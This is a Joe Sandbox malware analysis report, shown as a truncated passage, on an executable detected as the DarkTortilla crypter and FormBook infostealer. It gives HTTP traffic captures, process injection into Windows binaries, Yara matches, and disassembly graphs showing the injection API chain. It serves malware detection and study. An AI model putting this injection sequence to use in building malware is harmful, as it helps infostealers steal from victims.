                                            Data Ascii: UPVdm=hlMsaaa3BAkPUteA7XP++Gu8BuRewGfTOvgLeox++V1rVcTAFPlubTtjN5YW3RmzK6ocArhvEbxlUyUK2TczNVBvCpmruUzfiz0aCryMaSnkNjn8euFLHPujYX6pXwAfMTV/ab87Y3nTNu/9XFPEbr5gZ8NqW0jCt0TFyNsKZZ6Zg8GrNBwSA6Gi90LO4VTjMk6/eZJKTOy3v8nb433XBZRb3/9j7mTjuPTOn+BY4sfobLvcwNfslw8EXkgMIeJ76NRC7kJtkIRV/eaI3wXV3uxAtCze5s2+m/4a0/cfXDAt8Vh5cIpwKLx8XSoTM42ZY9AXKd51oyLgJPmGDLDayjlgvzU1nKliOW+Ej5U2F20KekoKl3v/NNhcLfoFxZz0IXKdwPFnv1uP9ZdGg0JVR8AZaF7Xp69MkgVEdohFM5SMupjdW+ErXsJtMv2iobw8oG+MH2uQ+d3T6m7rSIUTGvrD7V4e0KP6MFQDfFNRD4fZEUP32zXro/sxXW5wNewS6j8KL7aFJgLPiP2+owznKE/6om14DYsN2+u+Dn0m63tjgC9l8/E5qWotC3EAkdGEzyrwIrr1bgKKMM0kjWBYLnSYOhblKjPF3xqulHwA+NwETB75tyy2TAv6gfjrsyZc4HwQZDyBmbG/8P3BnCzGDGG0rJ4w0JXGj7Kwr1dXmwwGh6iGbuwDRarsW+o6cWAHZDjwm+kFpvqTK6sBM78oorHVERqHWuSZjstYCbDO9h7UUwlp931wXytgGQpC6nEENygi05guXmdaCBIBaBvGdjz5Djb8fFvn7HSmEHtBhPCvYrGyNN3b9hJWDhgr8C2dlR6ZAlY48L3e2fQalI8EOW+U+WxdgAfUYBjAkrJkWMFwWvOQ0vRBGr24tpM8yefHxHOy3D6rTcsW9ALcOfX7vZqyGCyDHdgeY9Km7dXAfeFIp4JAs7iGGeGWBnw+3ke2KH/pzRcHH720tIHUs3FzRr+lsHdGFeI1g3b8lblQMLfcYvFp+RS/yf/Bwo6qZTANPMceSzjv7qNtD9jCAqpmQYQwljpuojszSIDIS7zpghwhN33RNZ76AS39xgZUHEbcthbDFQ/LF3iDU0Ex77M1BpuhFV+GrcL9I3Qzrj6+/ICsIk3P4FnPvavUyb+lLsJxxZWVOAo7gsQbJhzSeTEcZlm17ju+oe13XrfJ8ihyx3wkDKeBfM3yT6F+hbK11454cQiaY+Ixo4WOLULRng==
                                            Apr 19, 2024 19:13:07.814277887 CEST240INHTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Encoding: gzip
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 19 Apr 2024 17:13:07 GMT
                                            Connection: close
                                            Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                            Data Ascii: a
                                            Apr 19, 2024 19:13:07.814342976 CEST464INData Raw: 31 63 39 0d 0a a5 52 31 8f d3 30 14 de f3 2b 2c 2f 49 24 6a 83 58 e8 b5 ee 70 88 f5 c4 70 1b 62 70 1c 37 f1 e1 c4 c6 7e 69 da a2 1b 3b 20 90 ee 26 d0 49 30 b1 f2 03 90 40 e2 cf d0 0a 26 fe 02 4e 13 ee 7a 08 26 2c d9 96 ed f7 7d ef fb de f3 cf cf
                                            Data Ascii: 1c9R10+,/I$jXppbp7~i; &I0@&Nz&,}_%T-+]{K{DiO+xL]ER<l^8eaTd/o7?lv/wov^n>n/>)Qm$7jCSCH'A.v'HyFFGZ2uPPfC#-S
                                            Apr 19, 2024 19:13:07.814358950 CEST13INData Raw: 38 0d 0a 9c 67 22 a1 1a 03 00 00 0d 0a
                                            Data Ascii: 8g"
                                            Apr 19, 2024 19:13:07.814374924 CEST5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:19:10:59
                                            Start date:19/04/2024
                                            Path:C:\Users\user\Desktop\rFV23+17555.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\rFV23+17555.exe"
                                            Imagebase:0xd0000
                                            File size:922'624 bytes
                                            MD5 hash:265A61C55A5139AC2FF0D9C53A64E1B1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2735654036.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:19:11:36
                                            Start date:19/04/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            Imagebase:0xfe0000
                                            File size:43'008 bytes
                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:19:12:23
                                            Start date:19/04/2024
                                            Path:C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe"
                                            Imagebase:0xa10000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:7
                                            Start time:19:12:24
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\PATHPING.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\PATHPING.EXE"
                                            Imagebase:0x650000
                                            File size:16'896 bytes
                                            MD5 hash:078AD26F906EF2AC1661FCAC84084256
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:8
                                            Start time:19:12:37
                                            Start date:19/04/2024
                                            Path:C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe"
                                            Imagebase:0xa10000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:9
                                            Start time:19:12:49
                                            Start date:19/04/2024
                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0x7ff79f9e0000
                                            File size:676'768 bytes
                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:19%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:5.4%
                                              Total number of Nodes:332
                                              Total number of Limit Nodes:26
                                              execution_graph 72500 7b29550 72501 7b29598 VirtualProtect 72500->72501 72502 7b295d2 72501->72502 72503 26d45c8 72504 26d45e6 72503->72504 72505 26d465e 72504->72505 72509 26d4720 72504->72509 72514 26d4730 72504->72514 72519 26d4875 72504->72519 72510 26d4744 72509->72510 72525 26d8ac0 72510->72525 72529 26d8a8f 72510->72529 72511 26d4837 72511->72505 72516 26d4744 72514->72516 72515 26d4837 72515->72505 72517 26d8a8f 3 API calls 72516->72517 72518 26d8ac0 3 API calls 72516->72518 72517->72515 72518->72515 72520 26d4879 72519->72520 72521 26d4754 72519->72521 72520->72505 72521->72519 72522 26d4837 72521->72522 72523 26d8a8f 3 API calls 72521->72523 72524 26d8ac0 3 API calls 72521->72524 72522->72505 72523->72522 72524->72522 72534 26d8cb0 72525->72534 72540 26d8ca0 72525->72540 72526 26d8ae1 72526->72511 72530 26d8a94 72529->72530 72531 26d8ae1 72530->72531 72532 26d8ca0 2 API calls 72530->72532 72533 26d8cb0 2 API calls 72530->72533 72531->72511 72532->72531 72533->72531 72536 26d8cce 72534->72536 72546 26d86e8 72534->72546 72537 26d8e30 InternetGetConnectedState 72536->72537 72539 26d8cda 72536->72539 72538 26d8e61 72537->72538 72538->72526 72539->72526 72541 26d86e8 InternetGetConnectedState 72540->72541 72542 26d8cce 72541->72542 72543 26d8e30 InternetGetConnectedState 72542->72543 72545 26d8cda 72542->72545 72544 26d8e61 72543->72544 72544->72526 72545->72526 72547 26d8de8 InternetGetConnectedState 72546->72547 72549 26d8e61 72547->72549 72549->72536 72320 6060040 72321 6060065 72320->72321 72325 6062970 72321->72325 72330 606296b 72321->72330 72322 6060076 72326 6062991 72325->72326 72335 6062a7f 72326->72335 72340 6062a80 72326->72340 72327 60629f5 72327->72322 72331 6062991 72330->72331 72333 6062a80 4 API calls 72331->72333 72334 6062a7f 4 API calls 72331->72334 72332 60629f5 72332->72322 72333->72332 72334->72332 72336 6062aa1 72335->72336 72345 6062b28 72336->72345 72350 6062b27 72336->72350 72337 6062ada 72337->72327 72341 6062aa1 72340->72341 72343 6062b27 4 API calls 72341->72343 72344 6062b28 4 API calls 72341->72344 72342 6062ada 72342->72327 72343->72342 72344->72342 72346 6062b5b 72345->72346 72355 60657d8 72346->72355 72362 60657c8 72346->72362 72347 6062bdc 72347->72337 72351 6062b5b 72350->72351 72353 60657c8 4 API calls 72351->72353 72354 60657d8 4 API calls 72351->72354 72352 6062bdc 72352->72337 72353->72352 72354->72352 72356 6065803 72355->72356 72358 6065a8b 72356->72358 72369 6068340 72356->72369 72357 6065ac9 72357->72347 72358->72357 72373 606a430 72358->72373 72378 606a421 72358->72378 72363 6065803 72362->72363 72365 6065a8b 72363->72365 72366 6068340 2 API calls 72363->72366 72364 6065ac9 72364->72347 72365->72364 72367 606a430 2 API calls 72365->72367 72368 606a421 2 API calls 72365->72368 72366->72365 72367->72364 72368->72364 72383 6068367 72369->72383 72386 6068378 72369->72386 72370 6068356 72370->72358 72375 606a440 72373->72375 72374 606a475 72374->72357 72375->72374 72409 606a5d1 72375->72409 72413 606a5e0 72375->72413 72379 606a42a 72378->72379 72380 606a475 72379->72380 72381 606a5e0 2 API calls 72379->72381 72382 606a5d1 2 API calls 72379->72382 72380->72357 72381->72380 72382->72380 72389 6068470 72383->72389 72384 6068387 72384->72370 72387 6068387 72386->72387 72388 6068470 2 API calls 72386->72388 72387->72370 72388->72387 72390 6068481 72389->72390 72391 60684a4 72389->72391 72390->72391 72397 60686f8 72390->72397 72401 6068708 72390->72401 72391->72384 72392 606849c 72392->72391 72393 60686a8 GetModuleHandleW 72392->72393 72394 60686d5 72393->72394 72394->72384 72399 6068708 72397->72399 72398 6068741 72398->72392 72399->72398 72405 6067f08 72399->72405 72402 606871c 72401->72402 72403 6067f08 LoadLibraryExW 72402->72403 72404 6068741 72402->72404 72403->72404 72404->72392 72406 60688e8 LoadLibraryExW 72405->72406 72408 6068961 72406->72408 72408->72398 72410 606a5ed 72409->72410 72412 606a627 72410->72412 72417 6069b08 72410->72417 72412->72374 72414 606a5ed 72413->72414 72415 606a627 72414->72415 72416 6069b08 2 API calls 72414->72416 72415->72374 72416->72415 72418 6069b13 72417->72418 72420 606b340 72418->72420 72421 6069c10 72418->72421 72420->72420 72422 6069c1b 72421->72422 72426 606cd08 72422->72426 72431 606cd20 72422->72431 72423 606b3e9 72423->72420 72428 606cd24 72426->72428 72427 606cd5d 72427->72423 72428->72427 72437 606da50 72428->72437 72442 606da41 72428->72442 72433 606ce52 72431->72433 72434 606cd51 72431->72434 72432 606cd5d 72432->72423 72433->72423 72434->72432 72435 606da50 2 API calls 72434->72435 72436 606da41 2 API calls 72434->72436 72435->72433 72436->72433 72438 606da7b 72437->72438 72439 606db2a 72438->72439 72440 606ed20 CreateWindowExW 72438->72440 72441 606ed11 CreateWindowExW CreateWindowExW 72438->72441 72440->72439 72441->72439 72443 606da50 72442->72443 72444 606db2a 72443->72444 72445 606ed20 CreateWindowExW 72443->72445 72446 606ed11 CreateWindowExW CreateWindowExW 72443->72446 72445->72444 72446->72444 72550 d79cbd0 72551 d79cc10 ResumeThread 72550->72551 72553 d79cc41 72551->72553 72554 d79be50 72555 d79be90 VirtualAllocEx 72554->72555 72557 d79becd 72555->72557 72558 60610ac 72560 60610b1 72558->72560 72559 606231d 72560->72559 72561 6061aa7 72560->72561 72568 607e870 72560->72568 72572 607e861 72560->72572 72577 80c16b8 72560->72577 72581 80c16aa 72560->72581 72561->72559 72585 63c13f8 72561->72585 72590 63c1408 72561->72590 72570 60657c8 4 API calls 72568->72570 72571 60657d8 4 API calls 72568->72571 72569 607e883 72569->72560 72570->72569 72571->72569 72573 607e870 72572->72573 72575 60657c8 4 API calls 72573->72575 72576 60657d8 4 API calls 72573->72576 72574 607e883 72574->72560 72575->72574 72576->72574 72578 80c16d7 72577->72578 72595 80c16e8 72577->72595 72600 80c16f8 72577->72600 72578->72560 72583 80c16e8 4 API calls 72581->72583 72584 80c16f8 4 API calls 72581->72584 72582 80c16d7 72582->72560 72583->72582 72584->72582 72586 63c143a 72585->72586 72605 63c8240 72586->72605 72609 63c8230 72586->72609 72587 63c6ad9 72587->72559 72591 63c143a 72590->72591 72593 63c8230 DeleteFileW 72591->72593 72594 63c8240 DeleteFileW 72591->72594 72592 63c6ad9 72592->72559 72593->72592 72594->72592 72596 80c1726 72595->72596 72598 60657c8 4 API calls 72596->72598 72599 60657d8 4 API calls 72596->72599 72597 80c175c 72597->72578 72598->72597 72599->72597 72601 80c1726 72600->72601 72603 60657c8 4 API calls 72601->72603 72604 60657d8 4 API calls 72601->72604 72602 80c175c 72602->72578 72603->72602 72604->72602 72606 63c8271 72605->72606 72613 63c84d0 72606->72613 72607 63c8329 72607->72587 72610 63c8271 72609->72610 72612 63c84d0 DeleteFileW 72610->72612 72611 63c8329 72611->72587 72612->72611 72614 63c84e4 72613->72614 72618 63c8c00 72614->72618 72622 63c8bff 72614->72622 72615 63c87db 72615->72607 72619 63c8c23 72618->72619 72626 63c0b18 72619->72626 72623 63c8c23 72622->72623 72624 63c0b18 DeleteFileW 72623->72624 72625 63c8fbc 72624->72625 72625->72615 72627 63c90a0 DeleteFileW 72626->72627 72629 63c8fbc 72627->72629 72629->72615 72630 d79c948 72631 d79c98d Wow64SetThreadContext 72630->72631 72633 d79c9d5 72631->72633 72634 d79c1c8 72635 d79c210 WriteProcessMemory 72634->72635 72637 d79c267 72635->72637 72638 d794048 72639 d79406f 72638->72639 72640 d7940b7 72639->72640 72642 d794fa8 72639->72642 72643 d794feb 72642->72643 72644 d79541c 72643->72644 72655 d797799 72643->72655 72659 d797762 72643->72659 72663 d797713 72643->72663 72667 d797683 72643->72667 72671 d79755f 72643->72671 72675 d7975f1 72643->72675 72679 d7974b8 72643->72679 72683 d7979bf 72643->72683 72687 d797598 72643->72687 72691 d7974c8 72643->72691 72644->72639 72656 d7977a3 72655->72656 72657 d7977ab 72656->72657 72695 d799cb0 72656->72695 72657->72643 72661 d797787 72659->72661 72660 d797794 72660->72643 72661->72660 72662 d799cb0 CreateProcessAsUserW 72661->72662 72662->72661 72664 d797724 72663->72664 72665 d797745 72664->72665 72666 d799cb0 CreateProcessAsUserW 72664->72666 72665->72643 72666->72664 72669 d797694 72667->72669 72668 d7976b6 72668->72643 72669->72668 72670 d799cb0 CreateProcessAsUserW 72669->72670 72670->72669 72673 d797584 72671->72673 72672 d797593 72672->72643 72673->72672 72674 d799cb0 CreateProcessAsUserW 72673->72674 72674->72673 72677 d797602 72675->72677 72676 d797625 72676->72643 72677->72676 72678 d799cb0 CreateProcessAsUserW 72677->72678 72678->72677 72680 d7974d6 72679->72680 72681 d7974dd 72679->72681 72680->72643 72681->72680 72682 d799cb0 CreateProcessAsUserW 72681->72682 72682->72681 72684 d7979f7 72683->72684 72685 d797bb4 72684->72685 72686 d799cb0 CreateProcessAsUserW 72684->72686 72685->72643 72686->72684 72688 d7975a2 72687->72688 72689 d7975ad 72688->72689 72690 d799cb0 CreateProcessAsUserW 72688->72690 72689->72643 72690->72688 72692 d7974dd 72691->72692 72693 d7974d6 72691->72693 72692->72693 72694 d799cb0 CreateProcessAsUserW 72692->72694 72693->72643 72694->72692 72696 d799d2f CreateProcessAsUserW 72695->72696 72698 d799e30 72696->72698 72699 6075ef0 72700 6075f12 72699->72700 72701 60657c8 4 API calls 72699->72701 72702 60657d8 4 API calls 72699->72702 72701->72700 72702->72700 72703 6070c70 72704 6070cb2 72703->72704 72706 6070cb9 72703->72706 72705 6070d0a CallWindowProcW 72704->72705 72704->72706 72705->72706 72447 d79cfa0 72448 d79d12b 72447->72448 72450 d79cfc6 72447->72450 72450->72448 72451 d794d68 72450->72451 72452 d79d220 PostMessageW 72451->72452 72453 d79d28c 72452->72453 72453->72450 72707 d79f300 72708 d79f30e 72707->72708 72711 d79f32d 72707->72711 72712 d79e520 72708->72712 72713 d79f478 FindCloseChangeNotification 72712->72713 72714 d79f329 72713->72714 72715 d79b780 72716 d79b7c5 Wow64GetThreadContext 72715->72716 72718 d79b80d 72716->72718 72719 d79c6c0 72720 d79c708 VirtualProtectEx 72719->72720 72722 d79c746 72720->72722 72454 7b28568 72457 7b2857c 72454->72457 72455 7b285b8 72457->72455 72464 d7902e8 72457->72464 72468 d790375 72457->72468 72472 d7902a4 72457->72472 72478 d790aea 72457->72478 72482 d790c0a 72457->72482 72486 d79021b 72457->72486 72490 d790ebb 72457->72490 72465 d7902a5 72464->72465 72465->72464 72494 d7927d0 72465->72494 72497 d7927d8 72465->72497 72470 d7927d8 VirtualProtect 72468->72470 72471 d7927d0 VirtualProtect 72468->72471 72469 d79038b 72470->72469 72471->72469 72473 d7902a5 72472->72473 72474 d7927d8 VirtualProtect 72472->72474 72475 d7927d0 VirtualProtect 72472->72475 72476 d7927d8 VirtualProtect 72473->72476 72477 d7927d0 VirtualProtect 72473->72477 72474->72473 72475->72473 72476->72473 72477->72473 72480 d7927d8 VirtualProtect 72478->72480 72481 d7927d0 VirtualProtect 72478->72481 72479 d790afb 72480->72479 72481->72479 72484 d7927d8 VirtualProtect 72482->72484 72485 d7927d0 VirtualProtect 72482->72485 72483 d790c1e 72484->72483 72485->72483 72488 d7927d8 VirtualProtect 72486->72488 72489 d7927d0 VirtualProtect 72486->72489 72487 d79017f 72487->72457 72488->72487 72489->72487 72492 d7927d8 VirtualProtect 72490->72492 72493 d7927d0 VirtualProtect 72490->72493 72491 d790ece 72492->72491 72493->72491 72495 d792820 VirtualProtect 72494->72495 72496 d79285a 72495->72496 72496->72465 72498 d792820 VirtualProtect 72497->72498 72499 d79285a 72498->72499 72499->72465 72723 606a6f8 72724 606a73e 72723->72724 72728 606a8d8 72724->72728 72731 606a8c8 72724->72731 72725 606a82b 72729 606a906 72728->72729 72734 6069bd0 72728->72734 72729->72725 72732 6069bd0 DuplicateHandle 72731->72732 72733 606a906 72732->72733 72733->72725 72735 606a940 DuplicateHandle 72734->72735 72736 606a9d6 72735->72736 72736->72729

                                              Executed Functions

                                              Function 026D71A8 Relevance: 12.2, Strings: 9, Instructions: 971COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2735547419.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_26d0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ojq$(ojq$(ojq$(ojq$(ojq$(ojq$(ojq$,nq$,nq
                                              • API String ID: 0-2862514371
                                              • Opcode ID: 89980495b6fab9a63fdd8bd27aab80cbb8e2fabe25f8e81d193ae32c899b8ce4
                                              • Instruction ID: 4a16bfc52c2ee6b1b3640379b3a5083c03ea34f18782f74a9f5f65ed3c4ed341
                                              • Opcode Fuzzy Hash: 89980495b6fab9a63fdd8bd27aab80cbb8e2fabe25f8e81d193ae32c899b8ce4
                                              • Instruction Fuzzy Hash: 23923934A00609CFCB16CF68D984AAEBBF2FF48314F258559E8199B3A5D734ED41CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 026D62B8 Relevance: 11.2, Strings: 8, Instructions: 1219COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2735547419.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_26d0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ojq$(ojq$(ojq$,nq$,nq$,nq$,nq$Hnq
                                              • API String ID: 0-2317327999
                                              • Opcode ID: 1172f7cca58e19579f5940e6bb2aff490bf51b1630ffa07c225d1a312256c778
                                              • Instruction ID: 6bf795fed4fdca04665e23fa54c44e0ce67b58e3ef280fcc1240008af1e27ffb
                                              • Opcode Fuzzy Hash: 1172f7cca58e19579f5940e6bb2aff490bf51b1630ffa07c225d1a312256c778
                                              • Instruction Fuzzy Hash: 81A26C70E002198FCB14DF69D894AAEBBF6BF88304F158469E815EB3A5DB34ED41CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CA940 Relevance: 11.0, Strings: 8, Instructions: 974COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1372 80ca940-80cdb07 1375 80cdb0d-80cdb13 1372->1375 1376 80cdcb5-80cdcf0 1372->1376 1377 80cdb54-80cdb68 1375->1377 1378 80cdb15-80cdb1c 1375->1378 1401 80cdc8b-80cdc95 1376->1401 1402 80cdcf2-80cdd06 1376->1402 1379 80cdb8a-80cdb93 1377->1379 1380 80cdb6a-80cdb6e 1377->1380 1382 80cdb1e-80cdb2b 1378->1382 1383 80cdb36-80cdb4f call 80cbf24 1378->1383 1385 80cdbad-80cdbc9 1379->1385 1386 80cdb95-80cdba2 1379->1386 1380->1379 1384 80cdb70-80cdb7c 1380->1384 1382->1383 1383->1377 1384->1379 1395 80cdb7e-80cdb84 1384->1395 1398 80cdbcf-80cdbda 1385->1398 1399 80cdc71-80cdc89 1385->1399 1386->1385 1395->1379 1407 80cdbdc-80cdbe2 1398->1407 1408 80cdbf2-80cdbf9 1398->1408 1399->1401 1409 80cdc9f 1401->1409 1410 80cdc97 1401->1410 1403 80cdd08-80cdd15 1402->1403 1404 80cdd20-80cdd2d 1402->1404 1403->1404 1412 80cdd35-80cdd3a 1404->1412 1413 80cdbe4 1407->1413 1414 80cdbe6-80cdbe8 1407->1414 1415 80cdc0d-80cdc30 call 80c930c 1408->1415 1416 80cdbfb-80cdc05 1408->1416 1409->1376 1410->1409 1418 80cdd3c-80cdd43 1412->1418 1419 80cdd81-80cdd88 1412->1419 1413->1408 1414->1408 1426 80cdc41-80cdc52 1415->1426 1427 80cdc32-80cdc3f 1415->1427 1416->1415 1424 80cdd5d-80cdd72 1418->1424 1425 80cdd45-80cdd52 1418->1425 1422 80cdd8a-80cdd97 1419->1422 1423 80cdda2-80cddab 1419->1423 1422->1423 1428 80cddad-80cddaf 1423->1428 1429 80cddb1-80cddb4 1423->1429 1424->1419 1434 80cdd74-80cdd7b 1424->1434 1425->1424 1438 80cdc5f-80cdc6b 1426->1438 1439 80cdc54-80cdc57 1426->1439 1427->1426 1427->1438 1432 80cddb5-80cddc6 1428->1432 1429->1432 1441 80cddc8-80cddcf 1432->1441 1442 80cde09-80cde0c 1432->1442 1434->1419 1437 80cde0f-80cde3a call 80c5920 1434->1437 1452 80cde41-80cdea2 call 80c5920 1437->1452 1438->1398 1438->1399 1439->1438 1444 80cdde9-80cddfe 1441->1444 1445 80cddd1-80cddde 1441->1445 1444->1442 1450 80cde00-80cde07 1444->1450 1445->1444 1450->1442 1450->1452 1461 80cdeba-80cdec0 1452->1461 1462 80cdea4-80cdeb7 1452->1462 1463 80cdf30-80cdf88 1461->1463 1464 80cdec2-80cdec9 1461->1464 1466 80cdf8f-80cdfe7 1463->1466 1464->1466 1467 80cdecf-80cdedf 1464->1467 1472 80cdfee-80ce0fc 1466->1472 1467->1472 1473 80cdee5-80cdee9 1467->1473 1515 80ce14e-80ce1a6 1472->1515 1516 80ce0fe-80ce10e 1472->1516 1475 80cdeec-80cdeee 1473->1475 1478 80cdef0-80cdf00 1475->1478 1479 80cdf13-80cdf15 1475->1479 1487 80cdeeb 1478->1487 1488 80cdf02-80cdf11 1478->1488 1480 80cdf24-80cdf2d 1479->1480 1481 80cdf17-80cdf21 1479->1481 1487->1475 1488->1479 1488->1487 1519 80ce1ad-80ce2ba 1515->1519 1516->1519 1520 80ce114-80ce118 1516->1520 1554 80ce2bc-80ce2cf 1519->1554 1555 80ce2d2-80ce2d8 1519->1555 1521 80ce11b-80ce11d 1520->1521 1523 80ce11f-80ce12f 1521->1523 1524 80ce131-80ce133 1521->1524 1523->1524 1532 80ce11a 1523->1532 1526 80ce135-80ce13f 1524->1526 1527 80ce142-80ce14b 1524->1527 1532->1521 1556 80ce2da-80ce2e1 1555->1556 1557 80ce352-80ce3aa 1555->1557 1559 80ce2e7-80ce2eb 1556->1559 1560 80ce3b1-80ce409 1556->1560 1557->1560 1561 80ce410-80ce514 1559->1561 1562 80ce2f1-80ce2f5 1559->1562 1560->1561 1607 80ce516-80ce51a 1561->1607 1608 